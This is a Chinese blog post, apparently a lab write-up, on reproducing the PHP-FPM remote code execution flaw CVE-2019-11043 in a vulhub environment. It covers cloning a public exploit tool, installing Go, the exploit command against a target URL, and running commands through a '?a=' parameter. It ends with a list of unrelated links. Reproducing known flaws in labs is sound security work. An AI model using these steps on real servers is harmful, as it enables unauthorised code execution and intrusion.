当前位置: 首页 > news >正文

PHP-FPM 远程代码执行漏洞(CVE-2019-11043)复现

news 2025/6/28 7:16:37

启动环境

切换目录到vulhub/php/CVE-2019-11043下

查看端口

访问

安装漏洞利用工具

git clone https://github.com/neex/phuip-fpizdam.git

安装go语言

# 1、下载go,这里使用 go1.22.5 版本,可替换为最新版本
wget https://dl.google.com/go/go1.22.5.linux-amd64.tar.gz
 
# 2、解压
tar -C /usr/local -zxvf go1.22.5.linux-amd64.tar.gz
 
# 3、设置环境变量
echo 'export GOROOT=/usr/local/go' >> /etc/profile
echo 'export PATH=$PATH:$GOROOT/bin' >> /etc/profile
echo 'export GOPATH=$HOME/go' >> /etc/profile
 
# 4、当前shell生效(或重启系统使环境变量永久生效)
source /etc/profile
 
# 5、验证是否安装成功
go version
 
# 6、启用go模块
go env -w GO111MODULE=on
 
# 7、设置代理,以便国内下载依赖包加速
go env -w GOPROXY=https://goproxy.cn,direct

 攻击

go run . "http://ip地址:8080//index.php"

浏览器进行访问,成功复现,输入?a=命令

http://www.lryc.cn/news/433156.html

相关文章:

  • Rust : 从事量化的生态现状与前景
  • Java项目——苍穹外卖(一)
  • 20240908 每日AI必读资讯
  • HNU-2023电路与电子学-实验3
  • html基础语法 看这一篇就够了!
  • 【redis】redis的特性和主要应用场景
  • 部署后端WebSocket服务到AWS云服务器
  • 常见的集合
  • Swift知识点---RxSwift学习
  • 驾驭不断发展的人工智能世界
  • 冒泡排序——基于Java的实现
  • Mendix 创客访谈录|Mendix赋能汽车零部件行业:重塑架构,加速实践与数字化转型
  • 船舶机械设备5G智能工厂物联数字孪生平台,推进制造业数字化转型
  • 什么是jsonp请求
  • 【C++】STL容器详解【上】
  • 助贷行业的三大严峻挑战:贷款中介公司转型债务重组业务
  • 力扣第42题 接雨水
  • 轻松录制每一刻:探索2024年免费高清录屏应用
  • 【小沐学OpenGL】Ubuntu环境下glfw的安装和使用
  • [数据集][目标检测]汽油检泄漏检测数据集VOC+YOLO格式237张2类别
  • 图文解析保姆级教程:Postman专业接口测试工具的安装和基本使用
  • jenkins配置流水线
  • SQL 编程基础
  • sql 中名字 不可以 包含 mysql中 具有 特定意义 的单词
  • 分布式部署①
  • 开源可视化大屏superset Docker环境部署
  • tomato靶场通关攻略
  • 【Spring Boot 3】【Web】处理跨域资源共享 CORS
  • HUAWEI华为MateBook B5-420 i5 集显(KLCZ-WXX9,KLCZ-WDH9)原装出厂Windows10系统文件下载
  • 算法练习题10:leetcode76最小覆盖子串-滑动窗口